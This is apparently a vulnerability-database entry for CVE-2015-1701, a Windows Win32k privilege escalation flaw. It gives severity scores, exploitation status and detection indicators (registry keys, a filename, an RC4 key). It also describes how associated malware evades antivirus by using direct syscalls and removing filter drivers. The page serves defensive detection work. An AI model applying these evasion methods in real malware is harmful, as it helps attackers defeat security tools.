cbcvebase.
CVE-2015-1701
published 2015-04-21

CVE-2015-1701: Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted…

PriorityP187high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-03-24
Exploited in the wild
EPSS
56.20%
98.9th percentile
Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."

Affected

1 ranges
VendorProductVersion rangeFixed in
microsoftwindows_2003_server

Detection & IOCsextracted from sources · hover to see the quote

filenamerdpinst.exe
registryHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SetupExecute
registryHKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute
registry\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
pathProgramData\update\
  • Malware uses low-level direct system calls (INT 2Eh and CALL ntdll!KiFastSystemCall) to bypass user-space hooks used by AV and sandboxes.
  • Malware re-encrypts its string literals region with RC4 before process termination to hinder memory dump analysis; look for RC4 key 'dqrChZonUF' in memory.
  • Malware removes filter driver registry entries before reboot to prevent AV drivers from loading early in the boot process; monitor for bulk deletion of filter driver registry keys.
  • Purple Fox exploit chain uses CVE-2015-1701 alongside CVE-2018-8120 via an abused PowerSploit module when the current user lacks admin rights; monitor for PowerSploit module execution followed by msiexec.exe download activity.
  • APT16 delivered CVE-2015-1701 exploit via malicious Microsoft Word documents exploiting an EPS dict copy use-after-free vulnerability; resulting payloads are IRONHALO downloader or ELMER backdoor.
  • Malware checks two hard-coded MAC addresses and terminates if the host matches; also terminates if ZKTeco ZKAccess software is present — these anti-analysis checks can be used as behavioral detection triggers.
  • ·The SLUB backdoor issues commands to ALL infected hosts simultaneously via a shared GitHub gist; the attacker cannot target individual machines, meaning command IOCs observed in the gist apply to all victims at once.
  • ·Analysts relying solely on sandbox solutions may miss the full functionality of the CVE-2015-1701 sample due to extensive anti-sandboxing techniques; manual analysis or patching of environment checks is required.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.